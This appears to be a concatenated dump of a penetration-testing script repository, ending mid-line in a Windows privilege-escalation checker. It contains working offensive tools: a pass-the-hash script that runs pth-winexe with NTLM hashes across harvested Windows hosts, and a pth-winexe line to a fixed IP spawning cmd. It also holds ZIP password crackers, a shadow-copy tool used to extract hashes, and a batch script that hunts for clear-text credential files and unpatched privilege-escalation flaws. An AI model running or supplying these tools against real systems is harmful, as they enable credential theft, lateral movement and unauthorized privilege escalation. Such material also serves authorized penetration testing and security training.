3 | # daniel.torres@owasp.org 4 | # ISB.COM.BO 5 | THREADS="30" 6 | OKBLUE='\033[94m' 7 | OKRED='\033[91m' 8 | OKGREEN='\033[92m' 9 | RESET='\e[0m' 10 | 11 | #iptables -I INPUT -p icmp --icmp-type 8 -j DROP 12 | 13 | while getopts ":u:h:p:f:o:" OPTIONS 14 | do 15 | case $OPTIONS in 16 | u) USUARIO=$OPTARG;; 17 | h) HASH=$OPTARG;; 18 | p) PASSWORD=$OPTARG;; 19 | f) FILE=$OPTARG;; 20 | o) OUTPUT=$OPTARG;; 21 | ?) printf "Opcion invalida: -$OPTARG\n" $0 22 | exit 2;; 23 | esac 24 | done 25 | 26 | USUARIO=${USUARIO:=NULL} 27 | HASH=${HASH:=NULL} 28 | PASSWORD=${PASSWORD:=NULL} 29 | FILE=${FILE:=NULL} 30 | 31 | 32 | 33 | function print_ascii_art { 34 | cat << "EOF" 35 | ╦ ┌─┐┌─┐┌─┐┬ ┌─┐┌┬┐┌┬┐┬┌┐┌ ┌─┐┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐ 36 | ║ │ ││ ├─┤│ ├─┤ │││││││││ │ ├─┤├┤ │ ├┴┐├┤ ├┬┘ 37 | ╩═╝└─┘└─┘┴ ┴┴─┘ ┴ ┴─┴┘┴ ┴┴┘└┘ └─┘┴ ┴└─┘└─┘┴ ┴└─┘┴└─ 38 | daniel.torres@owasp.org 39 | https://github.com/DanielTorres1 40 | EOF 41 | } 42 | print_ascii_art 43 | if [ $USUARIO = NULL ] ; then 44 | echo "| " 45 | echo "| USO: local-admin-checker.sh -u [usuario] -h [hash] -p [password] -o [salida] -f [file]" 46 | echo "| " 47 | echo "" 48 | exit 49 | fi 50 | echo -e "$OKBLUE Probando con usuario: $USUARIO y hash $HASH $RESET" 51 | ###################### 52 | if [ $FILE = NULL ] ; then 53 | if [ -f reports/OS-report.txt ] 54 | then 55 | 56 | for ip in $(grep -i Windows reports/OS-report.txt | cut -d ";" -f1 ); do 57 | echo -e "[+] $OKBLUE Testeando $ip .. $RESET" 58 | if [ $HASH = NULL ] ; then 59 | #echo "PASSWORD $PASSWORD" 60 | pth-winexe -U $USUARIO%$PASSWORD //$ip ipconfig | grep -ai IPv4 | tee -a $OUTPUT 61 | else 62 | pth-winexe -U $USUARIO%aad3b435b51404eeaad3b435b51404ee:$HASH //$ip ipconfig | grep -ai IPv4 | tee -a $OUTPUT 63 | #echo "HASH $HASH" 64 | fi 65 | echo "" 66 | sleep 3 67 | done 68 | else 69 | echo -e "$OKRED [!] Error. Esta ejecuando en el directorio creado por lanScanner.sh ? $RESET" 70 | fi 71 | else 72 | for ip in $(cat $FILE); do 73 | echo -e "[+] $OKBLUE Testeando $ip .. $RESET" 74 | if [ $HASH = NULL ] ; then 75 | #echo "PASSWORD $PASSWORD" 76 | pth-winexe -U $USUARIO%$PASSWORD //$ip ipconfig | grep -ai IPv4 | tee -a $OUTPUT 77 | else 78 | pth-winexe -U $USUARIO%aad3b435b51404eeaad3b435b51404ee:$HASH //$ip ipconfig | grep -ai IPv4 | tee -a $OUTPUT 79 | #echo "HASH $HASH" 80 | fi 81 | echo "" 82 | sleep 3 83 | done 84 | fi 85 | -------------------------------------------------------------------------------- /PTH/pth-winexe.txt: -------------------------------------------------------------------------------- 1 | export SMBHASH= 2 | pth-winexe -U Administrator% //10.11.1.220 cmd 3 | -------------------------------------------------------------------------------- /PasswordCrack/zipcrack.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | from time import time 3 | import sys 4 | 5 | 6 | 7 | 8 | def usage(): 9 | print sys.argv[0], " secretfile passwordfile" 10 | 11 | 12 | def main(): 13 | secret_file = sys.argv[1] 14 | password_file = sys.argv[1] 15 | try: 16 | myZip = zipfile.ZipFile(secret_file) 17 | except zipfile.BadZipfile: 18 | print "[!] There was an error opening your zip file." 19 | return 20 | 21 | password = '' 22 | 23 | timeStart = time() 24 | with open(password_file, "r") as f: 25 | passes = f.readlines() 26 | for pass_count, x in enumerate(passes): 27 | password = x.strip() 28 | try: 29 | myZip.extractall(pwd = password) 30 | totalTime = time() - timeStart 31 | print "\nPassword cracked: %s\n" % password 32 | print "%i password attempts per second." % (pass_count/totalTime) 33 | return 34 | except Exception as e: 35 | if str(e[0]) == 'Bad password for file': 36 | pass # TODO: properly handle exceptions? 37 | elif 'Error -3 while decompressing' in str(e[0]): 38 | pass # TODO: properly handle exceptions? 39 | else: 40 | print e 41 | print "Sorry, password not found." 42 | 43 | if __name__ == '__main__': 44 | if len(sys.argv) < 3: 45 | usage() 46 | else: 47 | main() 48 | # https://www.doyler.net/security-not-included/python-zip-password-cracker 49 | -------------------------------------------------------------------------------- /PasswordCrack/zipcrack.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "ZIP-JTR Decrypt Script"; 3 | if [ $# -ne 2 ] 4 | then 5 | echo "Usage $0 "; 6 | exit; 7 | fi 8 | unzip -l $1 9 | for i in $(john --wordlist=$2 --rules --stdout) 10 | do 11 | echo -ne "\rtrying \"$i\" " 12 | unzip -o -P $i $1 >/dev/null 2>&1 13 | STATUS=$? 14 | if [ $STATUS -eq 0 ]; then 15 | echo -e "\nArchive password is: \"$i\"" 16 | break 17 | fi 18 | done 19 | -------------------------------------------------------------------------------- /PortFwd/README.md: -------------------------------------------------------------------------------- 1 | #### Python Port Foward 2 | 3 | - https://github.com/klsecservices/rpivot 4 | - https://github.com/vinodpandey/python-port-forward 5 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Linux/ps_history.sh: -------------------------------------------------------------------------------- 1 | # https://github.com/xiaoxiaoleo/pentest-script/edit/master/PrivilegeEscalation/Linux/ps_history.sh 2 | 3 | while true 4 | do 5 | echo "$(date '+TIME:%H:%M:%S') $(ps -e -o ruser,command >> pshistory)" | tee -a logfile 6 | awk '!seen[$0]++' pshistory > pshistory.temp 7 | mv pshistory.temp pshistory 8 | sleep 0.1 9 | done 10 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Windows/Hash/vssown.vbs: -------------------------------------------------------------------------------- 1 | REM Volume Shadow Copy Management from CLI. 2 | REM Part of the presentation "Lurking in the Shadows" by Mark Baggett and Tim "LaNMaSteR53" Tomes. 3 | REM Co-developed by Mark Baggett (@MarkBaggett) and Tim Tomes (@lanmaster53). 4 | 5 | Set args = WScript.Arguments 6 | 7 | if args.Count < 1 Then 8 | wscript.Echo "Usage: cscript vssown.vbs [option]" 9 | wscript.Echo 10 | wscript.Echo " Options:" 11 | wscript.Echo 12 | wscript.Echo " /list - List current volume shadow copies." 13 | wscript.Echo " /start - Start the shadow copy service." 14 | wscript.Echo " /stop - Halt the shadow copy service." 15 | wscript.Echo " /status - Show status of shadow copy service." 16 | wscript.Echo " /mode - Display the shadow copy service start mode." 17 | wscript.Echo " /mode [Manual|Automatic|Disabled] - Change the shadow copy service start mode." 18 | wscript.Echo " /create [drive_letter] - Create a shadow copy." 19 | wscript.Echo " /delete [id|*] - Delete a specified or all shadow copies." 20 | wscript.Echo " /mount [path] [device_object] - Mount a shadow copy to the given path." 21 | wscript.Echo " /execute [\path\to\file] - Launch executable from within an umounted shadow copy." 22 | wscript.Echo " /store - Display storage statistics." 23 | wscript.Echo " /size [bytes] - Set drive space reserved for shadow copies." 24 | REM build_off 25 | wscript.Echo " /build [filename] - Print pasteable script to stdout."REM no_build 26 | REM build_on 27 | wscript.Quit(0) 28 | End If 29 | 30 | strComputer = "." 31 | Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") 32 | 33 | Select Case args.Item(0) 34 | 35 | Case "/list" 36 | Wscript.Echo "SHADOW COPIES" 37 | Wscript.Echo "=============" 38 | Wscript.Echo 39 | Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy") 40 | For Each objItem in colItems 41 | Wscript.Echo "[*] ID: " & objItem.ID 42 | Wscript.Echo "[*] Client accessible: " & objItem.ClientAccessible 43 | Wscript.Echo "[*] Count: " & objItem.Count 44 | Wscript.Echo "[*] Device object: " & objItem.DeviceObject 45 | Wscript.Echo "[*] Differential: " & objItem.Differential 46 | Wscript.Echo "[*] Exposed locally: " & objItem.ExposedLocally 47 | Wscript.Echo "[*] Exposed name: " & objItem.ExposedName 48 | Wscript.Echo "[*] Exposed remotely: " & objItem.ExposedRemotely 49 | Wscript.Echo "[*] Hardware assisted: " & objItem.HardwareAssisted 50 | Wscript.Echo "[*] Imported: " & objItem.Imported 51 | Wscript.Echo "[*] No auto release: " & objItem.NoAutoRelease 52 | Wscript.Echo "[*] Not surfaced: " & objItem.NotSurfaced 53 | Wscript.Echo "[*] No writers: " & objItem.NoWriters 54 | Wscript.Echo "[*] Originating machine: " & objItem.OriginatingMachine 55 | Wscript.Echo "[*] Persistent: " & objItem.Persistent 56 | Wscript.Echo "[*] Plex: " & objItem.Plex 57 | Wscript.Echo "[*] Provider ID: " & objItem.ProviderID 58 | Wscript.Echo "[*] Service machine: " & objItem.ServiceMachine 59 | Wscript.Echo "[*] Set ID: " & objItem.SetID 60 | Wscript.Echo "[*] State: " & objItem.State 61 | Wscript.Echo "[*] Transportable: " & objItem.Transportable 62 | Wscript.Echo "[*] Volume name: " & objItem.VolumeName 63 | Wscript.Echo 64 | Next 65 | wscript.Quit(0) 66 | 67 | Case "/start" 68 | Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") 69 | For Each objService in colListOfServices 70 | objService.StartService() 71 | Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service." 72 | Next 73 | wscript.Quit(0) 74 | 75 | Case "/stop" 76 | Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") 77 | For Each objService in colListOfServices 78 | objService.StopService() 79 | Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service." 80 | Next 81 | wscript.Quit(0) 82 | 83 | Case "/status" 84 | Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") 85 | For Each objService in colListOfServices 86 | Wscript.Echo "[*] " & objService.State 87 | Next 88 | wscript.Quit(0) 89 | 90 | Case "/mode" 91 | Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") 92 | For Each objService in colListOfServices 93 | if args.Count < 2 Then 94 | Wscript.Echo "[*] " & objService.Name & " service set to '" & objService.StartMode & "' start mode." 95 | Else 96 | mode = LCase(args.Item(1)) 97 | if mode = "manual" or mode = "automatic" or mode = "disabled" Then 98 | errResult = objService.ChangeStartMode(mode) 99 | Wscript.Echo "[*] " & objService.Name & " service set to '" & mode & "' start mode." 100 | Else 101 | Wscript.Echo "[*] '" & mode & "' is not a valid start mode." 102 | End If 103 | END If 104 | Next 105 | wscript.Quit(errResult) 106 | 107 | Case "/create" 108 | VOLUME = args.Item(1) & ":\" 109 | Const CONTEXT = "ClientAccessible" 110 | Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy") 111 | Wscript.Echo "[*] Attempting to create a shadow copy." 112 | errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID) 113 | wscript.Quit(errResult) 114 | 115 | Case "/delete" 116 | id = args.Item(1) 117 | Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy") 118 | For Each objItem in colItems 119 | if objItem.ID = id Then 120 | Wscript.Echo "[*] Attempting to delete shadow copy with ID: " & id 121 | errResult = objItem.Delete_ 122 | ElseIf id = "*" Then 123 | Wscript.Echo "[*] Attempting to delete shadow copy " & objItem.DeviceObject & "." 124 | errResult = objItem.Delete_ 125 | End If 126 | Next 127 | wscript.Quit(errResult) 128 | 129 | Case "/mount" 130 | Set WshShell = WScript.CreateObject("WScript.Shell") 131 | link = args.Item(1) 132 | sc = args.Item(2) & "\" 133 | cmd = "cmd /C mklink /D " & link & " " & sc 134 | WshShell.Run cmd, 2, true 135 | Wscript.Echo "[*] " & sc & " has been mounted to " & link & "." 136 | wscript.Quit(0) 137 | 138 | Case "/execute" 139 | file = args.Item(1) 140 | Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy") 141 | Set objProcess = objWMIService.Get("Win32_Process") 142 | For Each objItem in colItems 143 | path = Replace(objItem.DeviceObject,"?",".") & file 144 | intReturn = objProcess.Create(path) 145 | if intReturn <> 0 Then 146 | wscript.Echo "[*] Process could not be created from " & path & "." 147 | wscript.Echo "[*] ReturnValue = " & intReturn 148 | Else 149 | wscript.Echo "[!] Process created from " & path & "." 150 | wscript.Quit(0) 151 | End If 152 | Next 153 | wscript.Quit(0) 154 | 155 | Case "/store" 156 | Wscript.Echo "SHADOW STORAGE" 157 | Wscript.Echo "==============" 158 | Wscript.Echo 159 | Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage") 160 | For Each objItem in colItems 161 | Wscript.Echo "[*] Allocated space: " & FormatNumber(objItem.AllocatedSpace / 1000000,0) & "MB" 162 | Wscript.Echo "[*] Maximum size: " & FormatNumber(objItem.MaxSpace / 1000000,0) & "MB" 163 | Wscript.Echo "[*] Used space: " & FormatNumber(objItem.UsedSpace / 1000000,0) & "MB" 164 | Wscript.Echo 165 | Next 166 | wscript.Quit(0) 167 | 168 | Case "/size" 169 | storagesize = CDbl(args.Item(1)) 170 | Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage") 171 | For Each objItem in colItems 172 | objItem.MaxSpace = storagesize 173 | objItem.Put_ 174 | Next 175 | Wscript.Echo "[*] Shadow storage space has been set to " & FormatNumber(storagesize / 1000000,0) & "MB." 176 | wscript.Quit(0) 177 | 178 | REM build_off 179 | Case "/build" 180 | build = 1 181 | Const ForReading = 1 182 | Set objFSO = CreateObject("Scripting.FileSystemObject") 183 | Set objTextFile = objFSO.OpenTextFile("vssown.vbs", ForReading) 184 | Do Until objTextFile.AtEndOfStream 185 | strNextLine = objTextFile.Readline 186 | if InStr(strNextLine,"REM build_off") = 3 Then 187 | build = 0 188 | End If 189 | if strNextLine <> "" and build = 1 Then 190 | strNextLine = Replace(strNextLine,"&","^&") 191 | strNextLine = Replace(strNextLine,">","^>") 192 | strNextLine = Replace(strNextLine,"<","^<") 193 | wscript.Echo "echo " & strNextLine & " >> " & args.Item(1) 194 | End If 195 | if InStr(strNextLine,"REM build_on") = 3 Then 196 | build = 1 197 | End If 198 | Loop 199 | wscript.Quit(0) 200 | REM build_on 201 | 202 | End Select 203 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Windows/README.md: -------------------------------------------------------------------------------- 1 | ##### Task schedule 2 | 3 | https://www.nirsoft.net/utils/task_scheduler_view.html 4 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Windows/WinPrivCheck.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem #---------------------------------------------------------------------------------# 4 | rem # Name = Windows Privilege Escalation Check v1.0 # 5 | rem # Reference = http://www.fuzzysecurity.com/tutorials/16.html # 6 | rem # Author = @ihack4falafel # 7 | rem # Date = 9/18/2017 # 8 | rem # Tested On = Windows XP SP3 - Professional # 9 | rem # Windows 7 SP1 - Entrprise # 10 | rem # Windows 10 - Professional # 11 | rem # Usage = WinPrivCheck.bat # 12 | rem # Requirements = accesschk.exe(old version) - sysinternals # 13 | rem #---------------------------------------------------------------------------------# 14 | 15 | 16 | @echo off 17 | rem Used rem instead of echo for cleaner output. 18 | @echo on 19 | 20 | rem #----------# 21 | rem # Hostname # 22 | rem #----------# 23 | 24 | @echo off 25 | 26 | hostname 27 | 28 | @echo on 29 | 30 | rem #----------# 31 | rem # Username # 32 | rem #----------# 33 | 34 | @echo off 35 | 36 | echo %username% 2>NUL 37 | whoami 2>NUL 38 | echo %userprofile% 2>NUL 39 | 40 | @echo on 41 | 42 | rem #-----------# 43 | rem # OS Verion # 44 | rem #-----------# 45 | 46 | @echo off 47 | 48 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 49 | 50 | @echo on 51 | 52 | rem #--------------------# 53 | rem # Installed Software # 54 | rem #--------------------# 55 | 56 | @echo off 57 | 58 | wmic product get Name, Version 59 | 60 | @echo on 61 | 62 | rem #-----------------# 63 | rem # Available Users # 64 | rem #-----------------# 65 | 66 | @echo off 67 | 68 | net users 69 | 70 | @echo on 71 | 72 | rem #----------------# 73 | rem # Network Config # 74 | rem #----------------# 75 | 76 | @echo off 77 | 78 | ipconfig /all 79 | 80 | @echo on 81 | 82 | rem #--------------# 83 | rem # Route Config # 84 | rem #--------------# 85 | 86 | @echo off 87 | 88 | route print 89 | 90 | @echo on 91 | 92 | rem #-----------# 93 | rem # ARP Cache # 94 | rem #-----------# 95 | 96 | @echo off 97 | 98 | arp -a 99 | 100 | @echo on 101 | 102 | rem #---------------------# 103 | rem # Network Connections # 104 | rem #---------------------# 105 | 106 | @echo off 107 | 108 | netstat -ano 109 | 110 | @echo on 111 | 112 | rem #-------------------# 113 | rem # Firewall Settings # 114 | rem #-------------------# 115 | 116 | @echo off 117 | 118 | netsh firewall show state 119 | netsh firewall show config 120 | 121 | @echo on 122 | 123 | rem #------------------# 124 | rem # Running Services # 125 | rem #------------------# 126 | 127 | @echo off 128 | 129 | net start 130 | 131 | @echo on 132 | 133 | rem #------------------------# 134 | rem # Local PrivEsc Exploits # 135 | rem #------------------------# 136 | 137 | @echo off 138 | 139 | rem Given this script is for all versions of Windows, I'd reference the results with the below matrix to avoid false postives. 140 | 141 | 142 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 143 | rem # Exploits Index | 2K | XP | 2K3 | 2K8 | Vista | 7 | Title | 144 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 145 | rem # KB2592799 | MS11-080 | X | SP3 | SP3 | X | X | X | afd.sys - Local privilege Escalation | 146 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 147 | rem # KB3143141 | MS16-032 | X | X | X | SP1/2 | SP2 | SP1 | Secondary Logon - Local privilege Escalation | 148 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 149 | rem # KB2393802 | MS11-011 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | WmiTraceMessageVa - Local privilege Escalation | 150 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 151 | rem # KB982799 | MS10-059 | X | X | X | ALL | ALL | SP0 | Chimichurri - Local privilege Escalation | 152 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 153 | rem # KB979683 | MS10-021 | SP4 | SP2/3 | SP2 | SP2 | SP0/1/2 | SP0 | Windows Kernel - Local privilege Escalation | 154 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 155 | rem # KB2305420 | MS10-092 | X | X | X | SP0/1/2 | SP1/2 | SP0 | Task Scheduler - Local privilege Escalation | 156 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 157 | rem # KB981957 | MS10-073 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | Keyboard Layout - Local privilege Escalation | 158 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 159 | rem # KB4013081 | MS17-017 | X | X | X | SP2 | SP2 | SP1 | Registry Hive Loading - Local privilege Escalation | 160 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 161 | rem # KB977165 | MS10-015 | ALL | ALL | ALL | ALL | ALL | ALL | User Mode to Ring - Local privilege Escalation | 162 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 163 | rem # KB941693 | MS08-025 | SP4 | SP2 | SP1/2 | SP0 | SP0/1 | X | win32k.sys - Local privilege Escalation | 164 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 165 | rem # KB920958 | MS06-049 | SP4 | X | X | X | X | X | ZwQuerySysInfo - Local privilege Escalation | 166 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 167 | rem # KB914389 | MS06-030 | ALL | SP2 | X | X | X | X | Mrxsmb.sys - Local privilege Escalation | 168 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 169 | rem # KB908523 | MS05-055 | SP4 | X | X | X | X | X | APC Data-Free - Local privilege Escalation | 170 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 171 | rem # KB890859 | MS05-018 | SP3/4 | SP1/2 | X | X | X | X | CSRSS - Local privilege Escalation | 172 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 173 | rem # KB842526 | MS04-019 | SP2/3/4 | X | X | X | X | X | Utility Manager - Local privilege Escalation | 174 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 175 | rem # KB835732 | MS04-011 | SP2/3/4 | SP0/1 | X | X | X | X | LSASS service BoF - Remote Code Execution | 176 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 177 | rem # KB841872 | MS04-020 | SP4 | X | X | X | X | X | POSIX - Local Privilege Escalation | 178 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 179 | rem # KB2975684 | MS14-040 | X | X | SP2 | SP2 | SP2 | SP1 | afd.sys Dangling Pointer - Local Privilege Escalation | 180 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 181 | rem # KB3136041 | MS16-016 | X | X | X | SP1/2 | SP2 | SP1 | WebDAV to Address - Local Privilege Escalation | 182 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 183 | rem # KB3057191 | MS15-051 | X | X | SP2 | SP2 | SP2 | SP1 | win32k.sys - Local Privilege Escalation | 184 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 185 | rem # KB2989935 | MS14-070 | X | X | SP2 | X | X | X | TCP/IP - Local Privilege Escalation | 186 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 187 | 188 | 189 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" | find /i "KB2592799" 1>NUL 190 | IF not errorlevel 1 ( 191 | 192 | echo MS11-080 patch is installed :( 193 | 194 | ) ELSE ( 195 | 196 | echo MS11-080 patch is NOT installed! 197 | 198 | ) 199 | 200 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" | find /i "KB3143141" 1>NUL 201 | IF not errorlevel 1 ( 202 | 203 | echo MS16-032 patch is installed :( 204 | 205 | ) ELSE ( 206 | 207 | echo MS16-032 patch is NOT installed! 208 | 209 | ) 210 | 211 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" | find /i "KB2393802" 1>NUL 212 | IF not errorlevel 1 ( 213 | 214 | echo MS11-011 patch is installed :( 215 | 216 | ) ELSE ( 217 | 218 | echo MS11-011 patch is NOT installed! 219 | 220 | ) 221 | 222 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" | find /i "KB982799" 1>NUL 223 | IF not errorlevel 1 ( 224 | 225 | echo MS10-059 patch is installed :( 226 | 227 | ) ELSE ( 228 | 229 | echo MS10-059 patch is NOT installed! 230 | 231 | ) 232 | 233 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" | find /i "KB979683" 1>NUL 234 | IF not errorlevel 1 ( 235 | 236 | echo MS10-021 patch is installed :( 237 | 238 | ) ELSE ( 239 | 240 | echo MS10-021 patch is NOT installed! 241 | 242 | ) 243 | 244 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" | find /i "KB2305420" 1>NUL 245 | IF not errorlevel 1 ( 246 | 247 | echo MS10-092 patch is installed :( 248 | 249 | ) ELSE ( 250 | 251 | echo MS10-092 patch is NOT installed! 252 | 253 | ) 254 | 255 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" | find /i "KB981957" 1>NUL 256 | IF not errorlevel 1 ( 257 | 258 | echo MS10-073 patch is installed :( 259 | 260 | ) ELSE ( 261 | 262 | echo MS10-073 patch is NOT installed! 263 | 264 | ) 265 | 266 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" | find /i "KB4013081" 1>NUL 267 | IF not errorlevel 1 ( 268 | 269 | echo MS17-017 patch is installed :( 270 | 271 | ) ELSE ( 272 | 273 | echo MS17-017 patch is NOT installed! 274 | 275 | ) 276 | 277 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" | find /i "KB977165" 1>NUL 278 | IF not errorlevel 1 ( 279 | 280 | echo MS10-015 patch is installed :( 281 | 282 | ) ELSE ( 283 | 284 | echo MS10-015 patch is NOT installed! 285 | 286 | ) 287 | 288 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" | find /i "KB941693" 1>NUL 289 | IF not errorlevel 1 ( 290 | 291 | echo MS08-025 patch is installed :( 292 | 293 | ) ELSE ( 294 | 295 | echo MS08-025 patch is NOT installed! 296 | 297 | ) 298 | 299 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" | find /i "KB920958" 1>NUL 300 | IF not errorlevel 1 ( 301 | 302 | echo MS06-049 patch is installed :( 303 | 304 | ) ELSE ( 305 | 306 | echo MS06-049 patch is NOT installed! 307 | 308 | ) 309 | 310 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" | find /i "KB914389" 1>NUL 311 | IF not errorlevel 1 ( 312 | 313 | echo MS06-030 patch is installed :( 314 | 315 | ) ELSE ( 316 | 317 | echo MS06-030 patch is NOT installed! 318 | 319 | ) 320 | 321 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" | find /i "KB908523" 1>NUL 322 | IF not errorlevel 1 ( 323 | 324 | echo MS05-055 patch is installed :( 325 | 326 | ) ELSE ( 327 | 328 | echo MS05-055 patch is NOT installed! 329 | 330 | ) 331 | 332 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" | find /i "KB890859" 1>NUL 333 | IF not errorlevel 1 ( 334 | 335 | echo MS05-018 patch is installed :( 336 | 337 | ) ELSE ( 338 | 339 | echo MS05-018 patch is NOT installed! 340 | 341 | ) 342 | 343 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" | find /i "KB842526" 1>NUL 344 | IF not errorlevel 1 ( 345 | 346 | echo MS04-019 patch is installed :( 347 | 348 | ) ELSE ( 349 | 350 | echo MS04-019 patch is NOT installed! 351 | 352 | ) 353 | 354 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" | find /i "KB835732" 1>NUL 355 | IF not errorlevel 1 ( 356 | 357 | echo MS04-011 patch is installed :( 358 | 359 | ) ELSE ( 360 | 361 | echo MS04-011 patch is NOT installed! 362 | 363 | ) 364 | 365 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" | find /i "KB841872" 1>NUL 366 | IF not errorlevel 1 ( 367 | 368 | echo MS04-020 patch is installed :( 369 | 370 | ) ELSE ( 371 | 372 | echo MS04-020 patch is NOT installed! 373 | 374 | ) 375 | 376 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" | find /i "KB2975684" 1>NUL 377 | IF not errorlevel 1 ( 378 | 379 | echo MS14-040 patch is installed :( 380 | 381 | ) ELSE ( 382 | 383 | echo MS14-040 patch is NOT installed! 384 | 385 | ) 386 | 387 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" | find /i "KB3136041" 1>NUL 388 | IF not errorlevel 1 ( 389 | 390 | echo MS16-016 patch is installed :( 391 | 392 | ) ELSE ( 393 | 394 | echo MS16-016 patch is NOT installed! 395 | 396 | ) 397 | 398 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" | find /i "KB3057191" 1>NUL 399 | IF not errorlevel 1 ( 400 | 401 | echo MS15-051 patch is installed :( 402 | 403 | ) ELSE ( 404 | 405 | echo MS15-051 patch is NOT installed! 406 | 407 | ) 408 | 409 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" | find /i "KB2989935" 1>NUL 410 | IF not errorlevel 1 ( 411 | 412 | echo MS14-070 patch is installed :( 413 | 414 | ) ELSE ( 415 | 416 | echo MS14-070 patch is NOT installed! 417 | 418 | ) 419 | 420 | 421 | 422 | @echo on 423 | 424 | rem #-------------------------# 425 | rem # File Transfer Utilities # 426 | rem #-------------------------# 427 | 428 | @echo off 429 | 430 | cscript /? 431 | powershell.exe /? 432 | tftp /? 433 | 434 | @echo on 435 | 436 | rem #-----------------------------# 437 | rem # Clear-text/base64 Passwords # 438 | rem #-----------------------------# 439 | 440 | @echo off 441 | 442 | type c:\sysprep.inf 443 | type c:\sysprep\sysprep.xml 444 | type %WINDIR%\Panther\Unattend\Unattended.xml 445 | type %WINDIR%\Panther\Unattended.xml 446 | dir /s *pass* 447 | dir /s *cred* 448 | dir /s *vnc* 449 | dir /s *.config 450 | 451 | @echo on 452 | 453 | rem #----------------------------------# 454 | rem # *.MSI Install - SYSTEM privilege # 455 | rem #----------------------------------# 456 | 457 | @echo off 458 | 459 | rem This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1. 460 | rem This setting will allow low privilege user to install any .MSI as system! 461 | 462 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 463 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 464 | 465 | @echo on 466 | 467 | rem #------------------------# 468 | rem # Unquoted Service Paths # 469 | rem #------------------------# 470 | 471 | @echo off 472 | 473 | wmic service get 